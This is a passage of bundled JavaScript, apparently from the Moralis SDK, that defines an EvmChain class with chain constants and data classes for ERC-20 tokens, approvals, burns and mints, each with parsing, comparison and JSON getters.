        this._chainlistData = (_a = $3dfc2d9370ba0cd1$var$chainList.find(function(chainData) {
            return chainData.chainId === _this.decimal;
        })) !== null && _a !== void 0 ? _a : null;
    }
    Object.defineProperty(EvmChain, "ETHEREUM", {
        /**
         * Returns ETHEREUM chain
         *
         * @example EvmChain.ETHEREUM
         */ get: function() {
            return EvmChain.create(1);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "GOERLI", {
        /**
         * Returns GOERLI chain
         *
         * @example EvmChain.GOERLI
         */ get: function() {
            return EvmChain.create(5);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "SEPOLIA", {
        /**
         * Returns SEPOLIA chain
         *
         * @example EvmChain.SEPOLIA
         */ get: function() {
            return EvmChain.create(11155111);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "POLYGON", {
        /**
         * Returns POLYGON chain
         *
         * @example EvmChain.POLYGON
         */ get: function() {
            return EvmChain.create(137);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "MUMBAI", {
        /**
         * Returns MUMBAI chain
         *
         * @example EvmChain.MUMBAI
         */ get: function() {
            return EvmChain.create(80001);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "BSC", {
        /**
         * Returns BSC chain
         *
         * @example EvmChain.BSC
         */ get: function() {
            return EvmChain.create(56);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "BSC_TESTNET", {
        /**
         * Returns BSC_TESTNET chain
         *
         * @example EvmChain.BSC_TESTNET
         */ get: function() {
            return EvmChain.create(97);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "AVALANCHE", {
        /**
         * Returns AVALANCHE chain
         *
         * @example EvmChain.AVALANCHE
         */ get: function() {
            return EvmChain.create(43114);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "AVALANCHE_TESTNET", {
        /**
         * Returns AVALANCHE_TESTNET chain
         *
         * @example EvmChain.AVALANCHE_TESTNET
         */ get: function() {
            return EvmChain.create(0xa869);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "FANTOM", {
        /**
         * Returns FANTOM chain
         *
         * @example EvmChain.FANTOM
         */ get: function() {
            return EvmChain.create(250);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "FANTOM_TESTNET", {
        /**
         * Returns FANTOM_TESTNET chain
         *
         * @example EvmChain.FANTOM_TESTNET
         */ get: function() {
            return EvmChain.create(4002);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "CRONOS", {
        /**
         * Returns CRONOS chain
         *
         * @example EvmChain.CRONOS
         */ get: function() {
            return EvmChain.create(25);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "PALM", {
        /**
         * Returns PALM chain
         *
         * @example EvmChain.PALM
         */ get: function() {
            return EvmChain.create(11297108109);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "ARBITRUM", {
        /**
         * Returns ARBITRUM chain
         *
         * @example EvmChain.ARBITRUM
         */ get: function() {
            return EvmChain.create(42161);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "ARBITRUM_TESTNET", {
        /**
         * Returns ARBITRUM_TESTNET chain
         *
         * @example EvmChain.ARBITRUM_TESTNET
         */ get: function() {
            return EvmChain.create(421613);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "RONIN", {
        /**
         * Returns RONIN chain
         *
         * @example EvmChain.RONIN
         */ get: function() {
            return EvmChain.create(2020);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain, "OPTIMISM", {
        /**
         * Returns OPTIMISM chain
         *
         * @example EvmChain.OPTIMISM
         */ get: function() {
            return EvmChain.create(10);
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Create a new instance of EvmChain from any valid address input.
     *
     * @example
     * ```ts
     * const chain = EvmChain.create(1)
     * const chain = EvmChain.create("0x3")
     * ```
     */ EvmChain.create = function(chain) {
        if (chain instanceof EvmChain) return chain;
        return new EvmChain(chain);
    };
    // Getter to return _chainlistData and throws an error if it is not defined
    EvmChain.prototype._getChainlistData = function() {
        if (!this._chainlistData) return null;
        return this._chainlistData;
    };
    /**
     * Compares if 2 chains are equal, based on the chainId
     *
     * @param chainA - The first chain to compare
     * @param chainB - The second chain to compare
     *
     * @returns true if the chains are equal, false otherwise
     * @example
     * ```ts
     * EvmChain.equals("1", "0x1")
     * ```
     */ EvmChain.equals = function(chainA, chainB) {
        return EvmChain.create(chainA)._value === EvmChain.create(chainB)._value;
    };
    /**
     * @returns all the available chains
     */ EvmChain.values = function() {
        return [
            EvmChain.ETHEREUM,
            EvmChain.GOERLI,
            EvmChain.SEPOLIA,
            EvmChain.POLYGON,
            EvmChain.MUMBAI,
            EvmChain.BSC,
            EvmChain.BSC_TESTNET,
            EvmChain.AVALANCHE,
            EvmChain.AVALANCHE_TESTNET,
            EvmChain.FANTOM,
            EvmChain.FANTOM_TESTNET,
            EvmChain.CRONOS,
            EvmChain.PALM,
            EvmChain.ARBITRUM,
            EvmChain.ARBITRUM_TESTNET,
            EvmChain.RONIN,
            EvmChain.OPTIMISM
        ];
    };
    /**
     * Compares if the current chain is equal to the provided chain, based on the chainId
     * @param chain - The chain to compare to
     * @returns true if the chains are equal, false otherwise
     * @example
     * ```ts
     * chain.equals(EvmChain.ETHEREUM)
     * ```
     */ EvmChain.prototype.equals = function(chain) {
        return EvmChain.equals(this, chain);
    };
    /**
     * Displays the chain hex-string representation of the chain and also the chain name if not null
     *
     * @example chain.display() // "Ethereum (0x1)" | "0x1"
     */ EvmChain.prototype.display = function() {
        return this.name ? "".concat(this.name, " (").concat(this.hex, ")") : this.hex;
    };
    /**
     * This function returns the explorer url of a block, transaction, account or token.
     *
     * @param value - An object containing the `block`, `transaction`, `account` or `erc20` to get the explorer url for.
     *
     * @example chain.getExplorerUrl({ block: 'block_here' }) // "https://etherscan.io/block/block_here"
     * @example chain.getExplorerUrl({ transaction: 'some_transaction' }) // "https://etherscan.io/tx/some_transaction"
     * @example chain.getExplorerUrl({ account: 'accoun_here' }) // "https://etherscan.io/address/accoun_here"
     * @example chain.getExplorerUrl({ erc20: 'token_here' }) // "https://etherscan.io/token/token_here"
     */ EvmChain.prototype.getExplorerPath = function(value) {
        var explorer = this.explorer;
        if (!explorer || explorer.standard !== "EIP3091") return null;
        var url = explorer.url;
        // See https://eips.ethereum.org/EIPS/eip-3091 for paths
        if ("block" in value) return "".concat(url, "/block/").concat(value.block);
        if ("transaction" in value) return "".concat(url, "/tx/").concat(value.transaction);
        if ("account" in value) return "".concat(url, "/address/").concat(value.account);
        if ("erc20" in value) return "".concat(url, "/token/").concat(value.erc20);
        return null;
    };
    Object.defineProperty(EvmChain.prototype, "decimal", {
        /**
         * Returns the decimal representation of the chain
         * @example chain.decimal // 1
         */ get: function() {
            return parseInt(this._value, 16);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain.prototype, "hex", {
        /**
         * Returns the hex-string representation of the chain
         * @example chain.hex // "0x1"
         */ get: function() {
            return this._value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain.prototype, "apiHex", {
        /**
         * Validate and cast to api compatible hex
         *
         * @example chain.apiHex // "0x1"
         */ get: function() {
            return this._value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain.prototype, "name", {
        /**
         * Returns the name of the chain
         * @example chain.name // "Ethereum"
         */ get: function() {
            var _a;
            return (_a = this._getChainlistData()) === null || _a === void 0 ? void 0 : _a.name;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain.prototype, "currency", {
        /**
         * Returns the currency of the chain
         * @returns The cuurrency of the chain or undefined if not found
         *
         * @example chain.currency // EvmNativeCurrency
         */ get: function() {
            var _a;
            return (_a = this._getChainlistData()) === null || _a === void 0 ? void 0 : _a.nativeCurrency;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain.prototype, "rpcUrls", {
        /**
         * Returns the rpc Urls of the chain
         *
         * @example chain.rpcUrls // ["https://mainnet.infura.io/v3/<infura-key>"]
         */ get: function() {
            var _a;
            return (_a = this._getChainlistData()) === null || _a === void 0 ? void 0 : _a.rpc;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmChain.prototype, "explorer", {
        /**
         * Returns the explorer Urls of the chain
         *
         * @example chain.explorerUrls // ["https://etherscan.io/"]
         */ get: function() {
            var _a;
            var explorers = (_a = this._getChainlistData()) === null || _a === void 0 ? void 0 : _a.explorers;
            if (!explorers || explorers.length === 0) return null;
            return explorers[0];
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Returns the chain as a string.
     * @returns The chain.
     */ EvmChain.prototype.toJSON = function() {
        return this.hex;
    };
    return EvmChain;
}();
/**
 * The Erc20Token class is a MoralisData that references to a Erc20 Token
 * It holds data about the data and metadata of an Erc20 token
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$28ff99e69b404cc = /** @class */ function() {
    function Erc20Token(value) {
        this._value = Erc20Token.parse(value);
    }
    /**
     *  Create a new instance of Erc20Token from any valid Erc20Token input
     *
     * @param value - the Erc20Tokenish type
     * @example
     * ```ts
     * const token = Erc20Token.create(value);
     * ```
     */ Erc20Token.create = function(value) {
        if (value instanceof Erc20Token) return value;
        return new Erc20Token(value);
    };
    /**
     * Compares two Erc20Token instances. This checks if the chain and contractAddress of both tokens are equal.
     *
     * @param valueA - the first Erc20Token to compare
     * @param valueB - the second Erc20Token to compare
     * @returns true if the two Erc20Tokens are equal
     * @example
     * ```ts
     * Erc20Token.equals(valueA, valueB);
     * ```
     */ Erc20Token.equals = function(valueA, valueB) {
        var erc20A = Erc20Token.create(valueA);
        var erc20B = Erc20Token.create(valueB);
        if (!erc20A._value.chain.equals(erc20B._value.chain)) return false;
        if (!erc20A._value.contractAddress.equals(erc20B._value.contractAddress)) return false;
        return true;
    };
    /**
     * Compares Erc20Token instance to current instance
     *
     * @param value - the Erc20Tokenish to compare
     * @returns true if the Erc20Token is equals given token
     * @example
     * ```ts
     * token.equals(value);
     * ```
     */ Erc20Token.prototype.equals = function(value) {
        return Erc20Token.equals(this, value);
    };
    /**
     * Returns the token as JSON
     *
     * @returns the Erc20Token as a JSON object
     * @example
     * ```ts
     * token.toJSON();
     * ```
     */ Erc20Token.prototype.toJSON = function() {
        var value = this._value;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, value), {
            contractAddress: value.contractAddress.toJSON(),
            chain: value.chain.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ Erc20Token.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(Erc20Token.prototype, "result", {
        /**
         * Returns the processed Erc20Token.
         *
         * @returns the Erc20Token value
         * @example
         * ```ts
         * token.result;
         *  ```
         */ get: function() {
            return this._value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "decimals", {
        /**
         * @returns the decimals of the token.
         *
         * @example
         * ```ts
         * token.decimals;
         * ```
         */ get: function() {
            return this._value.decimals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "name", {
        /**
         * @returns The name of the token.
         *
         * @example
         * ```ts
         * token.name;
         * ```
         */ get: function() {
            return this._value.name;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "symbol", {
        /**
         * @returns The symbol of the token.
         *
         * @example
         * ```ts
         * token.symbol;
         * ```
         */ get: function() {
            return this._value.symbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "contractAddress", {
        /**
         * @returns The contract address of the token.
         *
         * @example
         * ```ts
         * token.contractAddress;
         * ```
         */ get: function() {
            return this._value.contractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "chain", {
        /**
         * @returns The chain of the token.
         *
         * @example
         * ```ts
         * token.chain;
         * ```
         */ get: function() {
            return this._value.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "logo", {
        /**
         * @returns The logo of the token.
         *
         * @example
         * ```ts
         * token.logo;
         * ```
         */ get: function() {
            return this._value.logo;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "logoHash", {
        /**
         * @returns The logo hash of the token.
         *
         * @example
         * ```ts
         * token.logoHash;
         * ```
         */ get: function() {
            return this._value.logoHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "thumbnail", {
        /**
         * @returns The thumbnail of the token.
         *
         * @example
         * ```ts
         * token.thumbnail;
         * ```
         */ get: function() {
            return this._value.thumbnail;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Token.prototype, "possibleSpam", {
        /**
         * @returns possibility of the token being a spam token
         * @example transfer.possibleSpam // true
         */ get: function() {
            return this._value.possibleSpam;
        },
        enumerable: false,
        configurable: true
    });
    Erc20Token.parse = function(value) {
        return {
            decimals: +value.decimals,
            name: value.name,
            symbol: value.symbol,
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(value.contractAddress),
            logo: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(value.logo),
            logoHash: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(value.logoHash),
            thumbnail: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(value.thumbnail),
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(value.chain),
            possibleSpam: value.possibleSpam
        };
    };
    return Erc20Token;
}();
/**
 * The Erc20Approval is a representation of an Erc20 token approval.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$bf30cc2feafa6bb3 = /** @class */ function() {
    function Erc20Approval(data) {
        this._data = Erc20Approval.parse(data);
    }
    /**
     * Create a new instance of Erc20Approval from any valid input
     * @param data -  Erc20Approval instance or valid Erc20ApprovalInput
     * @example
     * ```
     * const approval = Erc20Approval.create(data);
     *```
     */ Erc20Approval.create = function(data) {
        if (data instanceof Erc20Approval) return data;
        return new Erc20Approval(data);
    };
    /**
     * Check the equality between two Erc20 approvals
     * @param dataA - The first approval to compare
     * @param dataB - The second approval to compare
     * @example Erc20Approval.equals(dataA, dataB)
     * @returns true if the approvals are equal, false otherwise
     */ Erc20Approval.equals = function(dataA, dataB) {
        var approvalA = Erc20Approval.create(dataA);
        var approvalB = Erc20Approval.create(dataB);
        return JSON.stringify(approvalA.toJSON()) === JSON.stringify(approvalB.toJSON());
    };
    /**
     * Checks the equality of the current approval with another erc20 approval
     * @param data - the approval to compare with
     * @example approval.equals(data)
     * @returns true if the approvals are equal, false otherwise
     */ Erc20Approval.prototype.equals = function(data) {
        return Erc20Approval.equals(this, data);
    };
    /**
     * @returns a JSON representation of the approval.
     * @example approval.toJSON()
     */ Erc20Approval.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            contractAddress: data.contractAddress.toJSON(),
            blockNumber: data.blockNumber.toString(),
            toWallet: data.toWallet.toJSON(),
            fromWallet: data.fromWallet.toJSON(),
            value: data.value.toString()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ Erc20Approval.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(Erc20Approval.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example approval.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "toWallet", {
        /**
         * @returns the toWallet of the approval
         * @example approval.toWallet // EvmAddress
         */ get: function() {
            return this._data.toWallet;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "fromWallet", {
        /**
         * @returns the fromWallet of the approval
         * @example approval.fromWallet // EvmAddress
         */ get: function() {
            return this._data.fromWallet;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "contractAddress", {
        /**
         * @returns the contractAddress of the approval
         * @example approval.contractAddress // EvmAddress
         */ get: function() {
            return this._data.contractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "blockHash", {
        /**
         * @returns the block hash of the approval
         * @example approval.blockHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "blockNumber", {
        /**
         * @returns the block number of the approval
         * @example approval.blockNumber // BigNumber
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "blockTimestamp", {
        /**
         * @returns the block timestamp of the approval
         * @example approval.blockTimestamp // Date
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "chain", {
        /**
         * @returns the chain of the approval
         * @example approval.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "transactionHash", {
        /**
         * @returns the transaction hash of the approval
         * @example approval.transactionHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "value", {
        /**
         * @returns the value of the approval
         * @example approval.value // BigNumber
         */ get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "transactionIndex", {
        /**
         * @returns the transactionIndex of the approval
         * @example approval.transactionIndex // 3
         */ get: function() {
            return this._data.transactionIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "logIndex", {
        /**
         * @returns the logIndex of the approval
         * @example approval.logIndex // 2
         */ get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "possibleSpam", {
        /**
         * @returns possibility of the token being a spam token
         * @example transfer.possibleSpam // true
         */ get: function() {
            return this._data.possibleSpam;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "tokenName", {
        /**
         * @returns The name of the token.
         * @example burn.tokenName // "Kylin Network"
         */ get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "tokenLogo", {
        /**
         * @returns The logo of the token
         * @example burn.tokenLogo // "https://cdn.moralis.io/eth/0x67b6d479c7bb412c54e03dca8e1bc6740ce6b99c.png"
         */ get: function() {
            return this._data.tokenLogo;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "tokenSymbol", {
        /**
         * @returns The symbol of the token.
         * @example burn.tokenSymbol // "KYL"
         */ get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Approval.prototype, "tokenDecimals", {
        /**
         * @returns The decimals of the token.
         * @example burn.tokenDecimals // 18
         */ get: function() {
            return this._data.tokenDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Erc20Approval.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.contractAddress),
            fromWallet: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.fromWallet),
            toWallet: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.toWallet),
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            transactionIndex: Number(data.transactionIndex),
            logIndex: Number(data.logIndex),
            tokenDecimals: Number(data.tokenDecimals)
        });
    };
    return Erc20Approval;
}();
/**
 * The Erc20Burn is a representation of an Erc20 token burn.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$ef21c6c8b687afec = /** @class */ function() {
    function Erc20Burn(data) {
        this._data = Erc20Burn.parse(data);
    }
    /**
     * Create a new instance of Erc20Burn from any valid input
     * @param data -  Erc20Burn instance or valid Erc20BurnInput
     * @example
     * ```
     * const burn = Erc20Burn.create(data);
     *```
     */ Erc20Burn.create = function(data) {
        if (data instanceof Erc20Burn) return data;
        return new Erc20Burn(data);
    };
    /**
     * Check the equality between two Erc20 burns
     * @param dataA - The first burn to compare
     * @param dataB - The second burn to compare
     * @example Erc20Burn.equals(dataA, dataB)
     * @returns true if the burns are equal, false otherwise
     */ Erc20Burn.equals = function(dataA, dataB) {
        var burnA = Erc20Burn.create(dataA);
        var burnB = Erc20Burn.create(dataB);
        return JSON.stringify(burnA.toJSON()) === JSON.stringify(burnB.toJSON());
    };
    /**
     * Checks the equality of the current burn with another erc20 burn
     * @param data - the burn to compare with
     * @example burn.equals(data)
     * @returns true if the burns are equal, false otherwise
     */ Erc20Burn.prototype.equals = function(data) {
        return Erc20Burn.equals(this, data);
    };
    /**
     * @returns a JSON representation of the burn.
     * @example burn.toJSON()
     */ Erc20Burn.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            contractAddress: data.contractAddress.toJSON(),
            blockNumber: data.blockNumber.toString(),
            fromWallet: data.fromWallet.toJSON(),
            value: data.value.toString()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ Erc20Burn.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(Erc20Burn.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example burn.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "fromWallet", {
        /**
         * @returns the fromWallet of the burn
         * @example burn.fromWallet // EvmAddress
         */ get: function() {
            return this._data.fromWallet;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "contractAddress", {
        /**
         * @returns the contractAddress of the burn
         * @example burn.contractAddress // EvmAddress
         */ get: function() {
            return this._data.contractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "blockHash", {
        /**
         * @returns the block hash of the burn
         * @example burn.blockHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "blockNumber", {
        /**
         * @returns the block number of the burn
         * @example burn.blockNumber // BigNumber
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "blockTimestamp", {
        /**
         * @returns the block timestamp of the burn
         * @example burn.blockTimestamp // Date
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "chain", {
        /**
         * @returns the chain of the burn
         * @example burn.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "transactionHash", {
        /**
         * @returns the transaction hash of the burn
         * @example burn.transactionHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "value", {
        /**
         * @returns the value of the burn
         * @example burn.value // BigNumber
         */ get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "transactionIndex", {
        /**
         * @returns the transactionIndex of the burn
         * @example burn.transactionIndex // 3
         */ get: function() {
            return this._data.transactionIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "logIndex", {
        /**
         * @returns the logIndex of the burn
         * @example burn.logIndex // 2
         */ get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "tokenName", {
        /**
         * @returns The name of the token.
         * @example burn.tokenName // "Kylin Network"
         */ get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "tokenLogo", {
        /**
         * @returns The logo of the token
         * @example burn.tokenLogo // "https://cdn.moralis.io/eth/0x67b6d479c7bb412c54e03dca8e1bc6740ce6b99c.png"
         */ get: function() {
            return this._data.tokenLogo;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "tokenSymbol", {
        /**
         * @returns The symbol of the token.
         * @example burn.tokenSymbol // "KYL"
         */ get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Burn.prototype, "tokenDecimals", {
        /**
         * @returns The decimals of the token.
         * @example burn.tokenDecimals // 18
         */ get: function() {
            return this._data.tokenDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Erc20Burn.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.contractAddress),
            fromWallet: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.fromWallet),
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            transactionIndex: Number(data.transactionIndex),
            logIndex: Number(data.logIndex),
            tokenDecimals: Number(data.tokenDecimals)
        });
    };
    return Erc20Burn;
}();
/**
 * The Erc20Mint is a representation of an Erc20 token mint.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$e659ed95207d1806 = /** @class */ function() {
    function Erc20Mint(data) {
        this._data = Erc20Mint.parse(data);
    }
    /**
     * Create a new instance of Erc20Mint from any valid input
     * @param data -  Erc20Mint instance or valid Erc20MintInput
     * @example
     * ```
     * const mint = Erc20Mint.create(data);
     *```
     */ Erc20Mint.create = function(data) {
        if (data instanceof Erc20Mint) return data;
        return new Erc20Mint(data);
    };
    /**
     * Check the equality between two Erc20 mints
     * @param dataA - The first mint to compare
     * @param dataB - The second mint to compare
     * @example Erc20Mint.equals(dataA, dataB)
     * @returns true if the mints are equal, false otherwise
     */ Erc20Mint.equals = function(dataA, dataB) {
        var mintA = Erc20Mint.create(dataA);
        var mintB = Erc20Mint.create(dataB);
        return JSON.stringify(mintA.toJSON()) === JSON.stringify(mintB.toJSON());
    };
    /**
     * Checks the equality of the current mint with another erc20 mint
     * @param data - the mint to compare with
     * @example mint.equals(data)
     * @returns true if the mints are equal, false otherwise
     */ Erc20Mint.prototype.equals = function(data) {
        return Erc20Mint.equals(this, data);
    };
    /**
     * @returns a JSON representation of the mint.
     * @example mint.toJSON()
     */ Erc20Mint.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            contractAddress: data.contractAddress.toJSON(),
            blockNumber: data.blockNumber.toString(),
            toWallet: data.toWallet.toJSON(),
            value: data.value.toString()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ Erc20Mint.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(Erc20Mint.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example mint.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "toWallet", {
        /**
         * @returns the toWallet of the mint
         * @example mint.toWallet // EvmAddress
         */ get: function() {
            return this._data.toWallet;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "contractAddress", {
        /**
         * @returns the contractAddress of the mint
         * @example mint.contractAddress // EvmAddress
         */ get: function() {
            return this._data.contractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "blockHash", {
        /**
         * @returns the block hash of the mint
         * @example mint.blockHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "blockNumber", {
        /**
         * @returns the block number of the mint
         * @example mint.blockNumber // BigNumber
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "blockTimestamp", {
        /**
         * @returns the block timestamp of the mint
         * @example mint.blockTimestamp // Date
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
